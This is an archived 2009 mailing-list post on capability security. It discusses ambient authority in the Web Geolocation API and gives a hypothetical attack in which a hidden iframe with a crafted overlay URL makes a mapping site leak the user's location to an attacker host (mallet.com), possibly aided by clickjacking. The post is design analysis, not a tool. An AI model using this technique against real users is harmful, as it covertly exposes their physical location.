[cap-talk] Ambient authority in the Web Geolocation API
Mark Seaborn
mrs at mythic-beasts.com
Wed Nov 18 23:28:20 PST 2009
On Thu, Oct 29, 2009 at 9:05 PM, I wrote:
> The API appears to introduce a new kind of ambient authority. Tyler
> Close's paper on clickjacking [2] argues that the root cause of the problem
> is use of ambient authority via cookies. Tyler argues that sites should use
> URLs-as-capabilities instead of cookies so that an attacker cannot guess the
> URL of a frame to embed.
>
> Though sites can opt not to use cookies as an implementation strategy, they
> can't opt out of using same-origin authorisation for persistent access to
> geolocation data. I suspect DOM storage [3] has a similar issue.
>
I have been trying to come up with a way that the ambient authority in the
geolocation API might get exploited. I have come up with a hypothetical
example but it might be far-fetched.
Suppose FooMaps.com is a mapping site that allows external sites to provide
custom image-tile overlays. It allows you to specify a base URL for the
image tiles as a URL parameter.
So, for example, you would visit
http://foomaps.com/map.py?overlay=http://bar.com/image.cgi<http://foomaps.com/map.php?overlay=http://bar.com/image.cgi>
and the resulting page would create <img> elements linking back to
http://bar.com/image.cgi?x=1234&y=4567
If an attacking page from mallet.com wishes to determine the user's
location, it can create an invisible iframe linking to
http://foomaps.com/map.py?overlay=http://mallet.com/user-id/image.cgi<http://foomaps.com/map.php?overlay=http://bar.com/image.cgi>,
and mallet.com can infer the user's location based on the HTTP requests it
receives.
If FooMaps.com requires the user to click on an icon before navigating the
map to the user's current position, the attacker must arrange a clickjacking
to get the user to click on the icon. Otherwise, the attacker's job is
simpler.
I am assuming that the user has previously visited FooMaps.com and has
granted it a persistent authorisation to read geolocation information, and
that this grant causes the browser to fulfill geolocation requests from the
origin FooMaps.com without further user interaction.
The question is, how likely is it that a site would provide a URL parameter
API like this? For example, it appears that Google Maps doesn't do this; it
provides Javascript for other sites to embed instead. OpenStreetMap has URL
parameters for setting longitude and latitude but not apparently for adding
custom layers.
Is there a deeper reason why sites do not or should not provide a URL
parameter API like this? It seems that this might be covered by the "Don't
Be A Deputy" (DBAD) discipline that Maciej Stachowiak proposed on the
w3.orgpublic-webapps mailing list [1] as a way to avoid the Confused
Deputy
problem in the context of CORS. One of the options in DBAD discipline is
"Never make a request to a site on behalf of a different site". Is it
generally understood to be a bad idea to embed URLs in URL parameters in
this way?
Mark
[1] http://lists.w3.org/Archives/Public/public-webapps/2009OctDec/0481.html
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://www.eros-os.org/pipermail/cap-talk/attachments/20091118/263f14f5/attachment.html
More information about the cap-talk
mailing list